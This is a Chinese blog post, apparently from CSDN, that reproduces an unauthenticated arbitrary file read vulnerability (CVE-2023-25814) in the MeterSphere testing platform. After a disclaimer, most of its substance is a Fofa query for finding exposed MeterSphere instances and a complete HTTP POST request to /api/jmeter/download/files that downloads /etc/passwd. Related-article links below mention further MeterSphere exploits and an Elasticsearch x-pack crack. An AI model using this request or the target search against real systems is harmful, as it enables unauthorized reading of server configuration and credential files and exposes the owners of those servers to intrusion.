MeterSphere 任意文件读取漏洞(CVE-2023-25814)

最新推荐文章于 2024-03-11 21:35:36 发布
最新推荐文章于 2024-03-11 21:35:36 发布
阅读量1.6k 收藏
点赞数 4
分类专栏: 漏洞复现 文章标签: metersphere web安全 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44304678/article/details/134282964
版权

MeterSphere 任意文件读取漏洞(CVE-2023-25814)

免责声明

仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。

漏洞描述

MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。MeterSphere存在未授权任意文件读取漏洞。

漏洞影响

MeterSphere

漏洞危害

未经允许的攻击者可通过该漏洞读取服务器配置信息,敏感文件等。

网络测绘

Fofa: title=“MeterSphere”

在这里插入图片描述
在这里插入图片描述

漏洞复现

1. 构造poc

POST /api/jmeter/download/files HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Encoding: gzip
Connection: close
Content-Type: application/json
Content-Length: 0

{"reportId":"pass","bodyFiles":[{"id":"aaa","name":"/etc/passwd"}]}

2. 发送数据包

在这里插入图片描述
发送后会自动下载一个压缩包,里面的内容就是我们读取的文件内容

在这里插入图片描述

3. 查看文件

在这里插入图片描述

小胡yhu
关注
专栏目录
MeterSphere files 任意文件读取漏洞复现 (CVE-2023-25573)
0xSec
12-16 1342
MeterSphere /api/jmeter/download/files 路径文件存在文件读取漏洞,攻击者可通过该漏洞读取系统重要文件(如数据库配置文件、系统配置文件)、数据库配置文件等等,导致网站处于极度不安全状态。
CVE-2023-25573:MeterSphere 任意文件下载漏洞复现[附POC]
薛定谔嘚喵博客
11-30 664
metersphere 是一个开源的持续测试平台。在受影响的版本中,“/api/jmeter/download/files”中存在不正确地访问控制漏洞,该漏洞允许任何用户无需身份验证即可下载任何文件。此问题可能会暴露运行进程可用的所有文件
Goby漏洞更新 | MeterSphere 文件读取漏洞CVE-2023-25814
m0_46699477的博客
04-07 732
MeterSphere 是一站式开源持续测试平台, 涵盖测试跟踪、接口测试、UI 测试和性能测试等功能,全面兼容 JMeter、Selenium 等主流开源标准。MeterSphere存在未授权任意文件读取漏洞
MeterSphere 匿名接口远程命令执行漏洞分析
whoami
01-10 2899
MeterSphere V1.16.3 匿名接口远程命令执行漏洞
MeterSphere 未授权RCE-代码审计
include_voidmain的博客
04-18 1405
0x01 代码分析 版本<=1.16.3 查看修复日志 https://github.com/metersphere/metersphere/pull/9135/commits/9927d2c587a2b388ee5d633f6cc31346df4415de 将/plugin/** 这个路由的未授权删除了,全局搜索/plugin定位到功能代码 跟进add方法中的pluginService.editPlugin(file) 跟进 在loadJar方法中使用URLClassLoader来加载j
CVE-2023-6548 和 CVE-2023-65的Citrix Netscaler/ADC-13.0-92.21 最新补丁
01-19
针对CVE-2023-6548 和 CVE-2023-6549 的 NetScaler ADC 和 NetScaler Gateway 的漏洞补丁升级包 CVE-2023-6548 :在管理接口上执行经过身份验证的(低特权)远程代码 CVE-2023-6549:拒绝服务 2、 强烈建议受影响...
Apache Ofbiz 任意文件读取漏洞CVE-2023-50968)
最新发布
weixin_43567873的博客
03-11 145
Apache Ofbiz 任意文件读取漏洞CVE-2023-50968)
【1day】复现traggo server任意文件读取漏洞CVE-2023-34843)
记录并分享学习安全的知识点..
07-11 501
Traggo Server是一个基于标签的时间跟踪工具。在Traggo中,没有任务,只有标记的时间跨度。可以用来跟踪、分析你每天的时间都用在哪些地方,方便你更好的管理时间,提高自己的效率。Traggo Server存在任意文件读取漏洞
POC_MeterSphere-RCE
LiBai'S BLOG
01-13 3618
《飞致云MeterSphere开源测试平台远程代码执行漏洞漏洞详情 MeterSphere一站式开源持续测试平台存在的远程代码执行漏洞。由于自定义插件功能处存在缺陷,未经身份验证的攻击者可利用该漏洞在目标系统上远程执行任意代码。请相关用户尽快采取措施进行防护。 MeterSphere是由杭州飞致云信息科技有限公司开发的一站式开源持续测试平台, 涵盖测试跟踪、接口测试、性能测试、 团队协作等功能。兼容 JMeter、Postman、Swagger 等开源、主流标准,助力开发和测试团队利用云弹性进行高度可
MeterSphere (metersphere-offline-installer-v1.19.1.part1.rar)
04-08
MeterSphere 是一站式开源持续测试平台,覆盖测试管理、接口测试、性能测试等。 metersphere-offline-installer-v1.19.1文件分割成三个压缩包,必须凑齐三个才能解压缩使用: metersphere-offline-installer-v1.19.1.part1.rar https://download.csdn.net/download/weixin_43800734/85092984 metersphere-offline-installer-v1.19.1.part2.rar https://download.csdn.net/download/weixin_43800734/85092988 metersphere-offline-installer-v1.19.1.part3.rar https://download.csdn.net/download/weixin_43800734/85092975
elasticsearch6.4.3的x-pack破解
03-22
替换elasticsearch/modules/x-pack-core/x-pack-core-6.4.3.jar,并更改证书5agame-non_production-156496a7-0586-4dc3-9dbd-249cb4e4d21e-v5.json
漏洞复现】ArrayVPN 任意文件读取漏洞
weixin_45530380的博客
12-28 952
漏洞复现】ArrayVPN 任意文件读取漏洞
Array-VPN任意文件读取
hobbo__的博客
08-15 1036
【代码】Array-VPN任意文件读取
MeterSphere自动化测试(1)-Charles工具使用
梦想成为一名优秀的测开人员
08-19 368
Charles工具简单使用
测试工作中需要的免费工具汇总
liwenxiang629的博客
05-12 1378
本文结合测试同学实际工作,汇总了工作所依赖的各类免费测试工具,涉及到基办公、缺陷管理、IDE选择、性能测试工具、安全测试工具、自动化测试工具、接口测试工具、数据库连接工具、服务器连接工具,话不多说直接展示! 办公 wps office 邮箱:foxmail 通信 微信,钉钉,飞书 缺陷管理 禅道免费版 文本编辑 notepad++ 思维导图 xmind试用版,基础思维导图使用,进行测试点设计足够了 IDE Java eclipse 、IntelliJ IDEA 社区版 Java ...
『Java安全』XStream 1.4.15反序列化漏洞CVE-2021-21345复现与浅析
Ho1aAs‘s Blog
08-17 1461
一种绕过黑名单、触发造成RCE的姿势XStream ≤ 1.4.15 PoC XStream怎么序列化和反序列化PriorityQueue? 分析PoC之前先看看XStream是怎么对待PriorityQueue的:PriorityQueue继承了Serializable,因此使用的是SerializableConveter 因此在doMarshal和doUnMarshal时会调用write/readObject 看PoC使用的是优先级队列,CC链的常客了,写一个demo看看XStream是怎么反序.
CVE-2022-22965 Spring远程代码执行漏洞复现
weixin_45260839的博客
05-22 3931
CVE-2022-22965 Spring远程代码执行漏洞复现
HTTPS 原理分析——带着疑问层层深入
java梦工厂
11-29 467
首发地址 https://blog.leapmie.com/archives/418/ HTTPS 随着 HTTPS 建站的成本下降,现在大部分的网站都已经开始用上 HTTPS 协议。大家都知道 HTTPS 比 HTTP 安全,也听说过与 HTTPS 协议相关的概念有 SSL 、非对称加密、 CA证书等,但对于以下灵魂三拷问可能就答不上了: 为什么用了 HTTPS 就是安全的? HTTP...
mysql安全漏洞CVE-2023-0215
07-29
很抱歉,但我无法回答关于"mysql安全漏洞CVE-2023-0215"的问题。因为在您提供的引用内容中,并没有提到与该漏洞相关的信息。如果您有其他关于该漏洞的引用内容或更多的背景信息,我将很乐意为您提供帮助。 #### 引用[.reference_title] - *1* *3* [CVE-2023-21839漏洞本地简单复现](https://blog.csdn.net/csdnmmd/article/details/129247272)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CVE-2023-0215](https://blog.csdn.net/qq_39933800/article/details/131203431)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值